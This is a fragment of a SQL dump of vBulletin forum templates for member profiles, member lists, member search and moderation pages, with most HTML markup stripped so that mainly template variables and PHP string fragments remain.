\r\n \r\n \r\n $infraction[dateline] $infraction[timeline] \r\n \" . construct_phrase(\"$vbphrase[by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$infraction[whoadded]\", \"$infraction[username]\") . \"\r\n \r\n \r\n $infraction[points] /\r\n \".(($show[\'reversed\']) ? (\"\r\n $vbphrase[reversed]\r\n \") : (\"\".(($show[\'expired\']) ? (\"\r\n $vbphrase[expired]\r\n \") : (\"\".(($show[\'neverexpires\']) ? (\"\r\n $vbphrase[never]\r\n \") : (\"\r\n $infraction[expires_dateline] $infraction[expires_timeline] \r\n \")).\"\")).\"\")).\"\r\n \r\n \".(($show[\'reverse\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=view&infractionid=$infraction[infractionid]\\\">$vbphrase[view] \r\n \") : (\"\")).\"\r\n \r\n', '
\r\n \r\n \r\n \r\n
\r\n \r\n $vbphrase[n_a] \r\n \r\n $infraction[title] \r\n \r\n $vbphrase[private] \r\n \r\n \r\n \r\n $vbphrase[profile_infraction]\r\n \r\n $vbphrase[profile_warning]\r\n \r\n \r\n
\r\n $vbphrase[reason]: $infraction[reason]
\r\n \r\n \r\n $infraction[dateline] $infraction[timeline] \r\n $vbphrase[by_x] \r\n \r\n \r\n $infraction[points] /\r\n \r\n $vbphrase[reversed]\r\n \r\n $vbphrase[expired]\r\n \r\n $vbphrase[never]\r\n \r\n $infraction[expires_dateline] $infraction[expires_timeline] \r\n \r\n \r\n \r\n $vbphrase[view] \r\n \r\n \r\n', 'template', 1202405906, 'vBulletin Solutions', '3.7.0 Beta 5', 'vbulletin'),
(1378, -1, 'memberinfo_membergroupbit', '
$usergroup[opentag]$usergroup[title]$usergroup[closetag]\".(($usergroup[description]) ? (\":\") : (\"\")).\" \r\n
$usergroup[description] \r\n', '
$usergroup[opentag]$usergroup[title]$usergroup[closetag]: \r\n
$usergroup[description] \r\n', 'template', 1176907884, 'vBulletin Solutions', '3.6.6', 'vbulletin'),
(1379, -1, 'memberinfo_profilefield', '\".(($show[\'profilefield_edit\']) ? (\"\r\n
$profilefield[title] \r\n
\r\n $profilefield[value]\r\n \r\n \r\n\") : (\"\r\n
$profilefield[title] \r\n
$profilefield[value] \r\n\")).\"', '
\r\n $profilefield[title] \r\n \r\n $profilefield[value]\r\n \r\n \r\n \r\n $profilefield[title] \r\n $profilefield[value] \r\n ', 'template', 1195134289, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1380, -1, 'memberinfo_profilefield_category', '\".(($show[\'profile_category_title\']) ? (\"\r\n
$category[title]\r\n \".(($category[\'description\']) ? (\"$category[description]
\") : (\"\")).\"\r\n \r\n $category[fields]\r\n \r\n \r\n\") : (\"\r\n
\r\n $category[fields]\r\n \r\n\")).\"', '
\r\n $category[title]\r\n $category[description]
\r\n \r\n $category[fields]\r\n \r\n \r\n \r\n \r\n $category[fields]\r\n \r\n ', 'template', 1194528605, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1381, -1, 'memberinfo_publicgroupbit', '
$usergroup[opentag]$usergroup[title]$usergroup[closetag] ', '
$usergroup[opentag]$usergroup[title]$usergroup[closetag] ', 'template', 1218471272, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1382, -1, 'memberinfo_quickedit', '\".(($show[\'quick_edit_form_tag\']) ? (\"
\") : (\"\")).\"\r\n\r\n\r\n\r\n \r\n \".(($show[\'editor_toolbar\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n
$newpost[message]
\r\n
\r\n
$vbphrase[reason_for_editing]:
\r\n
\r\n
\r\n
\r\n\r\n \r\n\r\n \r\n\r\n \".(($show[\'deletepostoption\']) ? (\"\r\n \r\n\r\n
\r\n\r\n
\r\n
$vbphrase[delete_message_check_appropriate_option]
\r\n \".(($show[\'firstpostnote\']) ? (\"\r\n
$vbphrase[deleting_message_deletion_of_thread]
\r\n \") : (\"\")).\"\r\n
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n \r\n\r\n
\r\n\r\n
\r\n \") : (\"\")).\"\r\n\r\n \r\n \r\n
\r\n\r\n\".(($show[\'quick_edit_form_tag\']) ? (\" \") : (\"\")).\"', '
\r\n\r\n
\r\n\r\n \r\n \r\n \r\n \r\n\r\n \r\n
$newpost[message]
\r\n
\r\n
$vbphrase[reason_for_editing]:
\r\n
\r\n
\r\n
\r\n\r\n \r\n\r\n \r\n\r\n \r\n \r\n\r\n
\r\n\r\n
\r\n
$vbphrase[delete_message_check_appropriate_option]
\r\n
\r\n $vbphrase[deleting_message_deletion_of_thread]
\r\n \r\n
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n \r\n\r\n
\r\n\r\n
\r\n \r\n\r\n \r\n \r\n
\r\n\r\n
', 'template', 1212070154, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1383, -1, 'memberinfo_small', '
\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \".(($show[\'breakfriendship\']) ? (\"session->vars[\'sessionurl\'] . \"do=removelist&userlist=friend&u=$remove[userid]&r=$remove[return]\\\">$vbphrase[break_friendship] \") : (\"\")).\"\r\n \r\n \".(($user[\'onlinestatus\']) ? (\"$user[onlinestatus] \") : (\"\")).\"\r\n \".(($GLOBALS[\'vbulletin\']->options[\'showimicons\']) ? (\"\r\n \".(($user[\'showicq\']) ? (\"$user[icqicon] \") : (\"\")).\"\r\n \".(($user[\'showmsn\']) ? (\"$user[msnicon] \") : (\"\")).\"\r\n \".(($user[\'showaim\']) ? (\"$user[aimicon] \") : (\"\")).\"\r\n \".(($user[\'showyahoo\']) ? (\"$user[yahooicon] \") : (\"\")).\"\r\n \".(($user[\'showskype\']) ? (\"$user[skypeicon] \") : (\"\")).\"\r\n \") : (\"\")).\"\r\n \r\n \r\n \r\n
\r\n ', '
\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[break_friendship] \r\n \r\n $user[onlinestatus] \r\n \r\n $user[icqicon] \r\n $user[msnicon] \r\n $user[aimicon] \r\n $user[yahooicon] \r\n $user[skypeicon] \r\n \r\n \r\n \r\n \r\n
\r\n ', 'template', 1196500122, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1384, -1, 'memberinfo_socialgroupbit', '
', '
\r\n
\r\n
\r\n
', 'template', 1226661608, 'vBulletin Solutions', '3.8.0 Beta 3', 'vbulletin'),
(1385, -1, 'memberinfo_socialgroupbit_text', '
\".(($showgrouplink) ? (\"session->vars[\'sessionurl\'] . \"groupid=$socialgroup[groupid]\\\">\") : (\"\")).\"$socialgroup[name_html]\".(($showgrouplink) ? (\" \") : (\"\")).\" ', '
$socialgroup[name_html] ', 'template', 1227787487, 'vBulletin Solutions', '3.8.0 Release Candidate 1', 'vbulletin'),
(1386, -1, 'memberinfo_tiny', '
\r\n\".(($user[\'avatarurl\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"u=$user[userid]\\\"> \r\n\") : (\"\")).\"\r\n \r\n ', '
\r\n\r\n width=\"$user[avatarwidth]\" height=\"$user[avatarheight]\" border=\"0\" class=\"alt2\" />\r\n\r\n \r\n ', 'template', 1198251924, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'),
(1387, -1, 'memberinfo_usercss', '', '', 'template', 1197372270, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1388, -1, 'memberinfo_visitorbit', '
session->vars[\'sessionurl\'] . \"u=$user[userid]\\\">$user[musername] $user[invisiblemark]$user[buddymark] ', '
$user[musername] $user[invisiblemark]$user[buddymark] ', 'template', 1196282951, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1389, -1, 'memberinfo_visitormessage', '
\r\n\".(($message[\'avatarurl\']) ? (\"\r\n \r\n \r\n\") : (\"\")).\"\r\n
\r\n
\r\n \".(($show[\'inlinemod\']) ? (\"
\") : (\"\")).\"\r\n
$message[date]\".((!$show[\'detailedtime\']) ? (\" $message[time] \") : (\"\")).\"
\r\n \".(($message[\'postuserid\']) ? (\"\r\n
session->vars[\'sessionurl\'] . \"u=$message[postuserid]\\\" class=\\\"smallfont username\\\">$message[musername] \r\n \") : (\"\r\n
$message[musername] \r\n \")).\"\r\n \".(($show[\'profile\']) ? (\"\r\n
\" . construct_phrase(\"$vbphrase[profile_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$message[profileuserid]&vmid=$message[vmid]#vmessage$message[vmid]\", \"$message[profileusername]\") . \"
\r\n \") : (\"\")).\"\r\n
\r\n
\r\n\r\n \".(($show[\'moderation\']) ? (\"
$vbphrase[this_message_is_moderated]
\") : (\"\")).\"\r\n
$message[message]
\r\n\r\n \".(($show[\'converse\'] OR $show[\'edit\'] OR $show[\'reportlink\'] OR $message[\'messageipaddress\']) ? (\"\r\n \".(($show[\'edit\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n
\r\n \") : (\"\")).\"\r\n\".(($message[\'avatarurl\']) ? (\"\r\n
\r\n\") : (\"\")).\"\r\n \r\n ', '
\r\n\r\n \r\n
width=\"$message[avatarwidth]\"
height=\"$message[avatarheight]\" border=\"0\" alt=\"$message[username]\" />
\r\n
\r\n \r\n\r\n
\r\n
\r\n
\r\n
$message[date] $message[time]
\r\n
\r\n $message[musername] \r\n \r\n $message[musername] \r\n \r\n
\r\n \r\n \r\n
\r\n
\r\n\r\n
$vbphrase[this_message_is_moderated]
\r\n
$message[message]
\r\n\r\n
\r\n \r\n \r\n \r\n \r\n \r\n
\r\n \r\n \r\n \r\n ', 'template', 1212070314, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1390, -1, 'memberinfo_visitormessage_deleted', '
\r\n \r\n
\r\n \".(($show[\'inlinemod\']) ? (\"
\") : (\"\")).\"\r\n
$message[date]\".((!$show[\'detailedtime\']) ? (\" $message[time] \") : (\"\")).\"
\r\n \".(($message[\'postuserid\']) ? (\"\r\n
session->vars[\'sessionurl\'] . \"u=$message[postuserid]\\\" class=\\\"smallfont username\\\">$message[musername] \r\n \") : (\"\r\n
$message[musername] \r\n \")).\"\r\n\r\n \".(($show[\'profile\']) ? (\"\r\n
\" . construct_phrase(\"$vbphrase[profile_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$message[profileuserid]&vmid=$message[vmid]#vmessage$message[vmid]\", \"$message[profileusername]\") . \"
\r\n \") : (\"\")).\"\r\n
\r\n
\r\n\r\n \".(($show[\'deleted\']) ? (\"$message[message]
\") : (\"\")).\"\r\n\r\n \r\n \" . construct_phrase(\"$vbphrase[message_deleted_by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$message[del_userid]\", \"$message[del_username]\") . \"\r\n \".(($message[\'del_reason\']) ? (\"$vbphrase[reason] $message[del_reason] \") : (\"\")).\"\r\n
\r\n\r\n \".(($show[\'edit\'] OR $show[\'reportlink\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n ', '
\r\n \r\n
\r\n
\r\n
$message[date] $message[time]
\r\n
\r\n $message[musername] \r\n \r\n $message[musername] \r\n \r\n\r\n
\r\n \r\n \r\n
\r\n
\r\n\r\n $message[message]
\r\n\r\n \r\n
$vbphrase[message_deleted_by_x] \r\n
$vbphrase[reason] $message[del_reason] \r\n
\r\n\r\n \r\n \r\n \r\n ', 'template', 1219145139, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1391, -1, 'memberinfo_visitormessage_global_ignored', '
\r\n \r\n\".(($show[\'conversepage\']) ? (\"\r\n \r\n\") : (\"\r\n \r\n\")).\"\r\n \r\n\r\n \" . construct_phrase(\"$vbphrase[administrator_decided_x_quiet]\", \"$message[username]\", \"profile.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=ignorelist\") . \"\r\n
\r\n ', '
\r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n
$vbphrase[administrator_decided_x_quiet] \r\n
\r\n ', 'template', 1210244767, 'vBulletin Solutions', '3.7.1', 'vbulletin'),
(1392, -1, 'memberinfo_visitormessage_ignored', '
\r\n \r\n \r\n \r\n\r\n \" . construct_phrase(\"$vbphrase[message_hidden_x_on_ignore_list]\", \"$message[username]\", \"profile.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=ignorelist\") . \"\r\n
\r\n ', '
\r\n \r\n \r\n \r\n\r\n
$vbphrase[message_hidden_x_on_ignore_list] \r\n
\r\n ', 'template', 1204631374, 'vBulletin Solutions', '3.7.0 Beta 6', 'vbulletin'),
(1393, -1, 'memberlist', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n
\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[members_list] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
\r\n\r\n $letterbits\r\n \r\n
\r\n\r\n\".(($show[\'popups\'] AND !$show[\'usergroup\']) ? (\"\r\n\r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n
\r\n\r\n$spacer_close\r\n$spacer_open\r\n\r\n\".(($pagenav) ? (\"\r\n
\r\n\r\n $pagenav \r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n
\r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n\r\n\r\n \r\n \r\n \" . construct_phrase(\"$vbphrase[showing_results_x_to_y_of_z]\", \"$first\", \"$last\", \"$totalusers\") . \"\r\n \r\n \" . construct_phrase(\"$vbphrase[search_took_x_seconds]\", \"$searchtime\") . \"\r\n \r\n \".(($show[\'usergroup\']) ? (\"\r\n $vbphrase[members_of_usergroup]: $leadergroup[title] \r\n \") : (\"\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \": $vbphrase[members_list]\r\n \")).\"\r\n \r\n \".((!$show[\'usergroup\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n
\r\n\r\n\r\n\r\n \r\n\r\n\".(($pagenav) ? (\"\r\n
\r\n\r\n $pagenav \r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n$spacer_close\r\n$spacer_open\r\n\r\n
\r\n\r\n
\r\n\r\n \r\n $forumjump \r\n \r\n
\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n
$vboptions[bbtitle] - $vbphrase[members_list] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
\r\n\r\n $letterbits\r\n \r\n
\r\n\r\n
\r\n\r\n\r\n\r\n \r\n\r\n
\r\n\r\n$spacer_close\r\n$spacer_open\r\n\r\n
\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n \r\n\r\n
\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[showing_results_x_to_y_of_z] \r\n \r\n $vbphrase[search_took_x_seconds] \r\n \r\n \r\n $vbphrase[members_of_usergroup]: $leadergroup[title] \r\n \r\n $vboptions[bbtitle]: $vbphrase[members_list]\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n
\r\n\r\n\r\n\r\n \r\n\r\n
\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n \r\n\r\n$spacer_close\r\n$spacer_open\r\n\r\n
\r\n\r\n
\r\n\r\n \r\n $forumjump \r\n \r\n
\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1212144677, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1394, -1, 'memberlist_letter', '\".(($show[\'selectedletter\']) ? (\"\r\n
[$currentletter ] \r\n\") : (\"\r\n
session->vars[\'sessionurl\'] . \"ltr=$linkletter&pp=$perpage&sort=$sortfield&order=$sortorder$usergrouplink$ltrurl\\\">$currentletter \r\n\")).\"', '
\r\n[$currentletter ] \r\n \r\n$currentletter \r\n ', 'template', 1210086457, 'vBulletin Solutions', '3.7.1', 'vbulletin'),
(1395, -1, 'memberlist_resultsbit', '
\r\n \r\n session->vars[\'sessionurl\'] . \"u=$userinfo[userid]\\\">$userinfo[musername] \r\n \".(($show[\'usertitlecol\']) ? (\"$userinfo[usertitle]
\") : (\"\")).\"\r\n \r\n \".(($show[\'emailcol\'] AND exec_switch_bg()) ? (\"\".(($show[\'emaillink\']) ? (\"session->vars[\'sessionurl\'] . \"do=mailmember&u=$userinfo[userid]\\\" target=\\\"_blank\\\" rel=\\\"nofollow\\\"> \") : (\"\")).\" \".(($show[\'pmlink\']) ? (\"session->vars[\'sessionurl\'] . \"do=newpm&u=$userinfo[userid]\\\" target=\\\"_blank\\\" rel=\\\"nofollow\\\"> \") : (\"\")).\" \") : (\"\")).\"\r\n \".(($show[\'imicons\'] AND exec_switch_bg()) ? (\"$userinfo[icqicon] $userinfo[aimicon] $userinfo[msnicon] $userinfo[yahooicon] $userinfo[skypeicon] \") : (\"\")).\"\r\n \".(($show[\'homepagecol\'] AND exec_switch_bg()) ? (\"\".(($show[\'homepagelink\']) ? (\" \") : (\" \")).\" \") : (\"\")).\"\r\n \".(($show[\'searchcol\'] AND exec_switch_bg()) ? (\"\".(($show[\'searchlink\']) ? (\"session->vars[\'sessionurl\'] . \"do=finduser&u=$userinfo[userid]\\\" rel=\\\"nofollow\\\"> \") : (\" \")).\" \") : (\"\")).\"\r\n \".(($show[\'datejoinedcol\'] AND exec_switch_bg()) ? (\"$userinfo[datejoined] \") : (\"\")).\"\r\n \".(($show[\'postscol\'] AND exec_switch_bg()) ? (\"$userinfo[posts] \") : (\"\")).\"\r\n \".(($show[\'lastvisitcol\'] AND exec_switch_bg()) ? (\"$userinfo[lastvisit] \") : (\"\")).\"\r\n \".(($show[\'reputationcol\'] AND exec_switch_bg()) ? (\"$userinfo[reputationdisplay] \") : (\"\")).\"\r\n \".(($show[\'avatarcol\'] AND exec_switch_bg()) ? (\"\".(($show[\'avatar\']) ? (\" \") : (\" \")).\" \") : (\"\")).\"\r\n \".(($show[\'profilepiccol\'] AND exec_switch_bg()) ? (\"$userinfo[profilepic] \") : (\"\")).\"\r\n \".(($show[\'birthdaycol\'] AND exec_switch_bg()) ? (\"$userinfo[birthday] \") : (\"\")).\"\r\n \".(($show[\'agecol\'] AND exec_switch_bg()) ? (\"$userinfo[age] \") : (\"\")).\"\r\n \".(($show[\'customfields\']) ? (\"$customfields\") : (\"\")).\"\r\n \".(($show[\'usergroup\'] AND exec_switch_bg()) ? (\"\".(($show[\'hideleader\']) ? (\" \") : (\" \")).\" \") : (\"\")).\"\r\n ', '
\r\n \r\n $userinfo[musername] \r\n $userinfo[usertitle]
\r\n \r\n $vbphrase[click_here_to_email_x]\" border=\"0\" /> $vbphrase[send_private_message_to_x]\" border=\"0\" /> \r\n $userinfo[icqicon] $userinfo[aimicon] $userinfo[msnicon] $userinfo[yahooicon] $userinfo[skypeicon] \r\n $vbphrase[visit_xs_homepage]\" border=\"0\" /> \r\n $vbphrase[find_all_posts_by_x]\" border=\"0\" /> \r\n $userinfo[datejoined] \r\n $userinfo[posts] \r\n $userinfo[lastvisit] \r\n $userinfo[reputationdisplay] \r\n $vbphrase[xs_avatar]\" hspace=\"4\" vspace=\"4\" /> \r\n $userinfo[profilepic] \r\n $userinfo[birthday] \r\n $userinfo[age] \r\n $customfields \r\n \r\n ', 'template', 1131117410, 'vBulletin Solutions', '3.5.2', 'vbulletin'),
(1396, -1, 'memberlist_resultsbit_field', '
$customfield ', '
$customfield ', 'template', 1070923933, 'vBulletin Solutions', '', 'vbulletin'),
(1397, -1, 'memberlist_results_header', '
$customfield ', '
$customfield ', 'template', 1070923876, 'vBulletin Solutions', '', 'vbulletin'),
(1398, -1, 'memberlist_search', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n
\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[members_list] - $vbphrase[search] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n\r\n\r\n $vbphrase[members_list] - $vbphrase[search] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[fields_on_form_optional]\r\n
\r\n\r\n
\r\n $vbphrase[username]\r\n
\r\n \".(($show[\'popups\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
\r\n\r\n
\r\n $vbphrase[home_page] \r\n \r\n
\r\n\r\n $customfields\r\n\r\n
\r\n $vbphrase[instant_messaging] \r\n \r\n \r\n\r\n
\r\n $vbphrase[post_count] \r\n \r\n \r\n\r\n
\r\n $vbphrase[join_date] \r\n \r\n \r\n\r\n
\r\n $vbphrase[last_post] \r\n \r\n \r\n\r\n
\r\n
\r\n\r\n $vbphrase[options]
\r\n\r\n \r\n
\r\n\r\n
\r\n $vbphrase[options] \r\n \r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n
\r\n\r\n
\r\n\r\n \r\n $forumjump \r\n \r\n
\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n
$vboptions[bbtitle] - $vbphrase[members_list] - $vbphrase[search] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
\r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[members_list] - $vbphrase[search] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[fields_on_form_optional]\r\n
\r\n\r\n
\r\n $vbphrase[username]\r\n
\r\n
\r\n \r\n \r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[home_page] \r\n \r\n
\r\n\r\n $customfields\r\n\r\n
\r\n $vbphrase[instant_messaging] \r\n \r\n \r\n\r\n
\r\n $vbphrase[post_count] \r\n \r\n \r\n\r\n
\r\n $vbphrase[join_date] \r\n \r\n \r\n\r\n
\r\n $vbphrase[last_post] \r\n \r\n \r\n\r\n
\r\n
\r\n\r\n $vbphrase[options]
\r\n\r\n \r\n
\r\n\r\n
\r\n $vbphrase[options] \r\n \r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n
\r\n\r\n
\r\n\r\n \r\n $forumjump \r\n \r\n
\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1212581967, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1399, -1, 'memberlist_search_optional_input', '$vbphrase[or]:
', '$vbphrase[or]:
', 'template', 1070078629, 'vBulletin Solutions', '', 'vbulletin'),
(1400, -1, 'memberlist_search_radio', '
\r\n $profilefield[title]:
\r\n \".(($radiobits) ? (\"
\") : (\"\")).\"\r\n $optionalfield\r\n
\r\n', '
\r\n $profilefield[title]:
\r\n
\r\n $optionalfield\r\n
\r\n', 'template', 1199995144, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'),
(1401, -1, 'memberlist_search_select', '
\r\n $profilefield[title]: \r\n \r\n \".(($profilefield[\'def\']!=2) ? (\" \") : (\"\")).\"\r\n $selectbits\r\n \r\n $optionalfield\r\n
\r\n', '
\r\n $profilefield[title]: \r\n \r\n \r\n $selectbits\r\n \r\n $optionalfield\r\n
\r\n', 'template', 1069675772, 'vBulletin Solutions', '', 'vbulletin'),
(1402, -1, 'memberlist_search_select_multiple', '
\r\n $profilefield[title]: \r\n \r\n $selectbits\r\n \r\n
\r\n', '
\r\n $profilefield[title]: \r\n \r\n $selectbits\r\n \r\n
\r\n', 'template', 1072806069, 'vBulletin Solutions', '', 'vbulletin'),
(1403, -1, 'memberlist_search_textbox', '
\r\n $profilefield[title]: \r\n userinfo[$profilefieldname] . \"\\\" size=\\\"$profilefield[size]\\\" maxlength=\\\"$profilefield[maxlength]\\\" />\r\n
\r\n', '
\r\n $profilefield[title]: \r\n \r\n
\r\n', 'template', 1069675812, 'vBulletin Solutions', '', 'vbulletin'),
(1404, -1, 'moderation_deletepictures', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n
\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[delete_pictures] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n
\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n
$vboptions[bbtitle] - $vbphrase[delete_pictures] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n
\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208875904, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1405, -1, 'moderation_filter', '
\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[display_options] \r\n \r\n\".(($show[havemessages]) ? (\"\r\n\r\n \" . construct_phrase(\"$vbphrase[showing_results_x_to_y_of_z]\", \"$first\", \"$last\", \"$messagetotal\") . \" \r\n \r\n\") : (\"\")).\"\r\n\r\n \r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n ', '
\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[display_options] \r\n \r\n\r\n\r\n $vbphrase[showing_results_x_to_y_of_z] \r\n \r\n \r\n\r\n \r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n ', 'template', 1214581775, 'vBulletin Solutions', '3.7.1', 'vbulletin'),
(1406, -1, 'moderation_groupdiscussions', '\".(($messagetotal) ? (\"\r\n
\r\n\") : (\"\")).\"\r\n \r\n \r\n \r\n $messagephrase\r\n \r\n \r\n \".((!$messagetotal) ? (\"\r\n \r\n \r\n $vbphrase[no_posts_found] \r\n $vbphrase[try_controls_below_for_older_posts] \r\n \r\n \r\n
\r\n \") : (\"\r\n \r\n \r\n \".(($messagetotal) ? (\"\r\n $vbphrase[discussion] \r\n $vbphrase[group_created] \r\n \") : (\"\")).\"\r\n \r\n \r\n $vbphrase[messages]\r\n \r\n \r\n $vbphrase[last_post]\r\n \r\n\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n $messagebits\r\n
\r\n\r\n \".(($show[\'inlinemod\'] OR $pagenav) ? (\"\r\n \r\n \".(($pagenav) ? (\"\r\n
\r\n $pagenav\r\n
\r\n \") : (\"\")).\"\r\n \".(($show[\'inlinemod\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n \".(($show[\'postlink\']) ? (\"
\") : (\"\")).\"\r\n
\r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'inlinemod\']) ? (\"\r\n\r\n \r\n\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n\r\n \r\n \r\n\")).\"\r\n\r\n \r\n\r\n$moderation_filter', '\r\n \r\n \r\n \r\n \r\n \r\n $messagephrase\r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[no_posts_found] \r\n $vbphrase[try_controls_below_for_older_posts] \r\n \r\n \r\n
\r\n \r\n \r\n \r\n \r\n $vbphrase[discussion] \r\n $vbphrase[group_created] \r\n \r\n \r\n \r\n $vbphrase[messages]\r\n \r\n \r\n $vbphrase[last_post]\r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n $messagebits\r\n \r\n\r\n \r\n \r\n
\r\n \r\n $pagenav\r\n
\r\n \r\n
\r\n \r\n \r\n
\r\n
\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n \r\n\r\n\r\n \r\n\r\n$moderation_filter', 'template', 1217933213, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1407, -1, 'moderation_groupmessages', '$memberinfo_css\r\n$socialgroups_css\r\n\r\n\r\n\r\n\".(($messagetotal) ? (\"\r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n
\r\n \".(($messagetotal) ? (\"\r\n \r\n \") : (\"\")).\"\r\n $vbphrase[messages] : $messagetotal \r\n $messagephrase\r\n
\r\n\r\n \".((!$messagetotal) ? (\"\r\n
\r\n $vbphrase[no_posts_found] \r\n $vbphrase[try_controls_below_for_older_posts] \r\n
\r\n \") : (\"\r\n
\r\n $messagebits\r\n \r\n\r\n
\r\n \")).\"\r\n
\r\n\r\n\".(($messagetotal) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n$moderation_filter', '$memberinfo_css\r\n$socialgroups_css\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n
\r\n \r\n \r\n \r\n $vbphrase[messages] : $messagetotal \r\n $messagephrase\r\n
\r\n\r\n
\r\n \r\n $vbphrase[no_posts_found] \r\n $vbphrase[try_controls_below_for_older_posts] \r\n
\r\n \r\n \r\n $messagebits\r\n \r\n\r\n \r\n \r\n
\r\n\r\n\r\n \r\n \r\n\r\n \r\n\r\n$moderation_filter', 'template', 1213102244, 'vBulletin Solutions', '3.7.1', 'vbulletin'),
